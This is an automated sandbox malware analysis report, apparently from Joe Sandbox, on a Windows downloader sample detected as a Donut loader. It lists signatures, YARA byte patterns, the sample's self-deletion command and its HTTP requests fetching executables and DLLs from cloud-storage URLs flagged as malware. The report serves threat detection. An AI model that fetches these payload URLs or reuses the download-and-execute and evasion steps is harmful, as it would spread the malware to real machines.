Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002B_185.exe

Overview

General Information

Sample name:LisectAVT_2403002B_185.exe
Analysis ID:1482004
MD5:0aafd40537a281b281bd85efcb2c976b
SHA1:d9b7aa59133586c9f885899b0483117500460036
SHA256:89daf7a9b800a5d38cf93accc70b5f24568aa65353e2c1b44199159a8cf888fb
Tags:exe
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Reads the Security eventlog
Reads the System eventlog
Self deletion via cmd or bat file
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file does not import any functions
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • LisectAVT_2403002B_185.exe (PID: 6932 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_185.exe" MD5: 0AAFD40537A281B281BD85EFCB2C976B)
    • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8048 cmdline: "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x237770:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x23af62:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\qd[1].binWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x3f08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x743e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Program Files (x86)\Everything\4.binWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x3f08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x743e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
00000000.00000002.1711974357.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xac08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0xe13e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x3f08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x743e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

System Summary

barindex
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe, ProcessId: 6932, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ojgxwqf.5ph.ps1
No Snort rule has matched
Timestamp:2024-07-25T17:03:08.460592+0200
SID:2011803
Source Port:443
Destination Port:49710
Protocol:TCP
Classtype:Executable code was detected
Timestamp:2024-07-25T17:03:37.607618+0200
SID:2022930
Source Port:443
Destination Port:55808
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T17:03:03.085315+0200
SID:2018581
Source Port:49709
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T17:03:39.276673+0200
SID:2022930
Source Port:443
Destination Port:55809
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T17:03:14.151724+0200
SID:2022930
Source Port:443
Destination Port:49712
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T17:03:11.570913+0200
SID:2100648
Source Port:443
Destination Port:49710
Protocol:TCP
Classtype:Executable code was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: LisectAVT_2403002B_185.exeAvira: detected
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/Avira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll4Avira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/;Avira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll/kdll-1323571269.cos.ap-beijinAvira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllZAvira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/XAvira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/YAvira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dlllAvira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllxAvira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllAvira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/wAvira URL Cloud: Label: malware
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: LisectAVT_2403002B_185.exeJoe Sandbox ML: detected
Source: LisectAVT_2403002B_185.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 82.156.94.45:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 82.156.94.13:443 -> 192.168.2.7:53539 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.153.232.152:443 -> 192.168.2.7:53540 version: TLS 1.2
Source: LisectAVT_2403002B_185.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: G:\Jenkins_MusicBoxWorkPrjCode\MusicBox_PUBLIC_RELESE_20-10-09_9.1.1.3\code\KwResource\bin\Release\pdb\KwTools.pdb source: LisectAVT_2403002B_185.exe
Source: Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0048EBE2 FindFirstFileExW,0_2_0048EBE2
Source: Joe Sandbox ViewIP Address: 43.153.232.152 43.153.232.152
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /zf_cef.dll HTTP/1.1User-Agent: Mozilla/5.0Host: leisuretrade-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_00473240 Sleep,InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,fpos,fpos,fpos,VirtualAlloc,fpos,VirtualFree,0_2_00473240
Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /zf_cef.dll HTTP/1.1User-Agent: Mozilla/5.0Host: leisuretrade-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /qd.bin HTTP/1.1User-Agent: loaderHost: wwwqd-1323571269.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: kdll-1323571269.cos.ap-beijing.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: wwwqd-1323571269.cos.ap-singapore.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/xmlContent-Length: 427Connection: closeDate: Thu, 25 Jul 2024 15:03:02 GMTServer: tencent-cosx-cos-request-id: NjZhMjY5MjVfOThiMzE0MGJfMTUxZGVfNDA2NTUzOA==
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng3.crl0
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://crl.globalsign.com/root.crl0Y
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1680040585.00000000077CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1716593820.00000000077D7000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1679430145.00000000077CB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1678937786.00000000077C8000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1678744043.00000000077BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1680040585.00000000077CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1679430145.00000000077CB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1678937786.00000000077C8000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1678744043.00000000077BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: zf_cef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1714454232.0000000004895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng30V
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://s.symcd.com06
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://s.symcd.com0_
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng3ocsp.crt04
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409518392.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409518392.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://sw.symcd.com0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409518392.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409518392.0000000000DA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.syma
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545427488.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1714454232.0000000004895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1714454232.0000000004895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1714454232.0000000004895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: msvcr120.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1616355619.0000000003F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beiji$W
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud&u
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1321968964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1319186272.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exeXg
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1321968964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1319186272.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exehf
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/?R
